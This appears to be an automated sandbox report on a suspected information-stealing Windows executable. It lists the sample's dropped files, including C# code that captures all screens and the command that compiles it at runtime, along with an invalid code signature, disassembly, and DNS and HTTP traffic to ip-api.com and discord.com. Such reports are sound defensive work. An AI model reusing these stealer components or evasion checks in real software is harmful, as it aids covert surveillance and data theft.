SHA1:DA73CD746174C8117F64006DD37D7BE3D72CEB9C
SHA-256:A39BACA57747173779F3E67F392B78EFC49F101153FB0F2EFD06ABBB0AAD4317
SHA-512:3AE9DA7C07304C5DBF67F1B6235E76A47EB1BA06BFDB43C113C7F99BADCBBDD65DF1F82AB84B2F8D7B1848080D5A8AB61DD4ED753D7FE468CDC17CF698D95F16
Malicious:false
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.e.x.z.y.3.0.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.e.x.z.y.3.0.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1004
Entropy (8bit):4.154581034278981
Encrypted:false
SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:C76055A0388B713A1EABE16130684DC3
SHA1:EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:false
Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (612), with no line terminators
Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):615
                                                                                                                                                                                                                                                                  Entropy (8bit):5.335836085523955
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5cNwiF:p37Lvkmb6KOkqe1xBkrk+ikNZuWZEJZj
                                                                                                                                                                                                                                                                  MD5:DF216C58F21FA0AE3786E2A894865D33
                                                                                                                                                                                                                                                                  SHA1:CCB5F483649C5782CC0C273BBB30EDDC63701788
                                                                                                                                                                                                                                                                  SHA-256:A2681B0CF5ACCC07522F9CFB543B6A7C5797E25AA5F382E9593814D3F526160F
                                                                                                                                                                                                                                                                  SHA-512:37398B1F49D67A688DBA49E8EBB435F3CCC7754CAD0F4A253545C5A18B63F073275165329716394AA97288B4DBA254C3FA8DFE5CA1DDF4AD4B8A83C9A999C1CC
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.0.cs"
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4096
                                                                                                                                                                                                                                                                  Entropy (8bit):3.154588496996072
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:6i7oEAtf0KhzBU/7f6mtJQN0BpW1ulVa3Jq:iNz0emoOBXK
                                                                                                                                                                                                                                                                  MD5:AC10229EEE2013E39C1F19B3CD433E97
                                                                                                                                                                                                                                                                  SHA1:86C8C1E86785652BBB1795FBBBE0F0F9CF4B30F1
                                                                                                                                                                                                                                                                  SHA-256:6E6D788355DBA5CB71110FDFE93B11AD12F552A91664208981BA836678695292
                                                                                                                                                                                                                                                                  SHA-512:204991AE3BA9E1AEB095DA1BA9DE7B4F27B4C28B4DEBFE970B402210B3876FBE48CB24003E01B72A227C532EADE78E441B0F382D3B671DC1E56B5A7460554386
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a6zg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (720), with CRLF, CR line terminators
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):1159
                                                                                                                                                                                                                                                                  Entropy (8bit):5.4998803639954685
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:KoNId3ka6KOkqeFkrvEvCKax5DqBVKVrdFAMBJTH:vNkka6NkqeFkrvEvCK2DcVKdBJj
                                                                                                                                                                                                                                                                  MD5:46089DB77D2615AD244A2DE94014A49D
                                                                                                                                                                                                                                                                  SHA1:133FAA07F61C613B29E43DCA0046CEEFB0F4B7EC
                                                                                                                                                                                                                                                                  SHA-256:93EF32D700F5D221A80F11670E53F3426CB59D4BF63F541768F4C4EE0948D633
                                                                                                                                                                                                                                                                  SHA-512:93B0096477CCB3229DCC03A3C2C1C4269E8CFCB9EA0584D8EE4DACD04A7329CD9CD46302D10A02306CE2DFF2C606642A35881BC458E44DA14E292D0308D0D070
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which i
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                  Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                                                  MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                                                  SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                                                  SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                                                  SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                                                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Entropy (8bit):7.99330670836274
                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                  File name:X9g8L63QGs.exe
                                                                                                                                                                                                                                                                  File size:7'849'526 bytes
                                                                                                                                                                                                                                                                  MD5:17e85e39754db87356121c00e17d3096
                                                                                                                                                                                                                                                                  SHA1:ab01140ebc61d625989f842eb2db9bdc79c15444
                                                                                                                                                                                                                                                                  SHA256:006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4
                                                                                                                                                                                                                                                                  SHA512:40e90e9148f1442b9a74d6f31febf0aa6a9d1e7761e6b7d2b2f340f6ece456386ae5abd991ca5c09fd610e0947357f677ce24756e0b906a26be8dd74f2914a3a
                                                                                                                                                                                                                                                                  SSDEEP:196608:HsunqZzwfI9jUC2XMvH8zPjweaBpZ0cX2ooccXK7oSr:/BIH2XgHq+jq93Yoa
                                                                                                                                                                                                                                                                  TLSH:DC863349679244F4FA379A3DD1539A1AD3F338A50760DB9B03A8A2760D734F11C3EB62
                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..
                                                                                                                                                                                                                                                                  Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                                  Entrypoint:0x14000ce20
                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                  Time Stamp:0x6755E76E [Sun Dec 8 18:37:34 2024 UTC]
                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                  Subsystem Version Major:6
Subsystem Version Minor: 0
Import Hash: 72c4e339b7af8ab1ed2eb3821c98713a
Signature Valid: false
Signature Issuer: CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After
• 29/09/2021 02:00:00, 29/09/2024 01:59:59
Subject Chain
• CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version: 3
Thumbprint MD5: 5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1: 3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256: 60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial: 00BFB15001BBF592D4962A7797EA736FA3
Instruction
dec eax
sub esp, 28h
call 00007FC6C0D3E8BCh
dec eax
add esp, 28h
jmp 00007FC6C0D3E4DFh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007FC6C0D3EC88h
test eax, eax
je 00007FC6C0D3E683h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007FC6C0D3E667h
dec eax
cmp ecx, eax
je 00007FC6C0D3E676h
xor eax, eax
dec eax
cmpxchg dword ptr [0003570Ch], ecx
jne 00007FC6C0D3E650h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007FC6C0D3E659h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007FC6C0D3E669h
mov byte ptr [000356F5h], 00000001h
call 00007FC6C0D3DDB5h
call 00007FC6C0D3F0A0h
test al, al
jne 00007FC6C0D3E666h
xor al, al
jmp 00007FC6C0D3E676h
call 00007FC6C0D4BBBFh
test al, al
jne 00007FC6C0D3E66Bh
xor ecx, ecx
call 00007FC6C0D3F0B0h
jmp 00007FC6C0D3E64Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000356BCh], 00000000h
mov ebx, ecx
jne 00007FC6C0D3E6C9h
cmp ecx, 01h
jnbe 00007FC6C0D3E6CCh
call 00007FC6C0D3EBFEh
test eax, eax
je 00007FC6C0D3E68Ah
test ebx, ebx
jne 00007FC6C0D3E686h
dec eax
lea ecx, dword ptr [000356A6h]
call 00007FC6C0D4B9B2h
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3ca34 | 0x78 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0x940 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x44000 | 0x2238 | .pdata |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x77a1ee | 0x2448 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x48000 | 0x764 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3a080 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x39f40 | 0x140 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x4a0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29f70 | 0x2a000 | b8c3814c5fb0b18492ad4ec2ffe0830a | False | 0.5518740699404762 | data | 6.489205819736506 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0x12a28 | 0x12c00 | f3bd08fa9607253f10f39407aac39507 | False | 0.5243229166666666 | data | 5.750755153198856 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x53f8 | 0xe00 | dba0caeecab624a0ccc0d577241601d1 | False | 0.134765625 | data | 1.8392217063172436 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x44000 | 0x2238 | 0x2400 | 9cd1eac931545f28ab09329f8bfce843 | False | 0.4697265625 | data | 5.2645170849678795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x47000 | 0x940 | 0xa00 | 8b1cef7be850248ceacb32298558d9c9 | False | 0.426953125 | data | 5.114581456168053 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x48000 | 0x764 | 0x800 | 816c68eeb419ee2c08656c31c06a0fff | False | 0.5576171875 | data | 5.2809528666624175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x470a0 | 0x390 | data | | | 0.4594298245614035
RT_MANIFEST | 0x47430 | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857
DLL | Import
USER32.dll | CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll |
KERNEL32.dll | GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718372107 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718380928 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718391895 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718422890 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718436003 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718473911 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718498945 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718545914 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718554974 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718568087 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718575954 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718592882 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718601942 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718667030 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718681097 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718693972 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718770981 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718907118 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.721143961 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:51.368621111 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:51.368705034 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:51.368758917 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:51.369402885 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:51.606484890 CET4990880192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:51.611466885 CET8049908208.95.112.1192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:51.611561060 CET4990880192.168.2.7208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 5, 2025 07:19:12.238410950 CET | 58039 | 53 | 192.168.2.7 | 1.1.1.1
Jan 5, 2025 07:19:12.247627020 CET | 53 | 58039 | 1.1.1.1 | 192.168.2.7
Jan 5, 2025 07:19:15.183485985 CET | 58925 | 53 | 192.168.2.7 | 1.1.1.1
Jan 5, 2025 07:19:15.190296888 CET | 53 | 58925 | 1.1.1.1 | 192.168.2.7
Jan 5, 2025 07:19:49.488965034 CET | 52318 | 53 | 192.168.2.7 | 1.1.1.1
Jan 5, 2025 07:19:49.495897055 CET | 53 | 52318 | 1.1.1.1 | 192.168.2.7
Jan 5, 2025 07:19:50.213215113 CET | 61888 | 53 | 192.168.2.7 | 1.1.1.1
Jan 5, 2025 07:19:50.219778061 CET | 53 | 61888 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 5, 2025 07:19:12.238410950 CET | 192.168.2.7 | 1.1.1.1 | 0xa512 | Standard query (0) | blank-ivnd9.in | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:15.183485985 CET | 192.168.2.7 | 1.1.1.1 | 0x9241 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:49.488965034 CET | 192.168.2.7 | 1.1.1.1 | 0xf7e5 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:50.213215113 CET | 192.168.2.7 | 1.1.1.1 | 0xd047 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 5, 2025 07:19:12.247627020 CET | 1.1.1.1 | 192.168.2.7 | 0xa512 | Name error (3) | blank-ivnd9.in | none | none | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:15.190296888 CET | 1.1.1.1 | 192.168.2.7 | 0x9241 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:49.495897055 CET | 1.1.1.1 | 192.168.2.7 | 0xf7e5 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:50.219778061 CET | 1.1.1.1 | 192.168.2.7 | 0xd047 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:50.219778061 CET | 1.1.1.1 | 192.168.2.7 | 0xd047 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:50.219778061 CET | 1.1.1.1 | 192.168.2.7 | 0xd047 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:50.219778061 CET | 1.1.1.1 | 192.168.2.7 | 0xd047 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:50.219778061 CET | 1.1.1.1 | 192.168.2.7 | 0xd047 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
• discord.com
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49708 | 208.95.112.1 | 80 | 3800 | C:\Users\user\Desktop\X9g8L63QGs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 5, 2025 07:19:15.198021889 CET | 117 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.2.3
Jan 5, 2025 07:19:15.674098015 CET | 175 | IN | HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 06:19:15 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49908 | 208.95.112.1 | 80 | 3800 | C:\Users\user\Desktop\X9g8L63QGs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 5, 2025 07:19:49.507232904 CET | 116 | OUT | GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.2.3
Jan 5, 2025 07:19:50.009412050 CET | 381 | IN | HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 06:19:49 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 204
Access-Control-Allow-Origin: *
X-Ttl: 25
X-Rl: 42
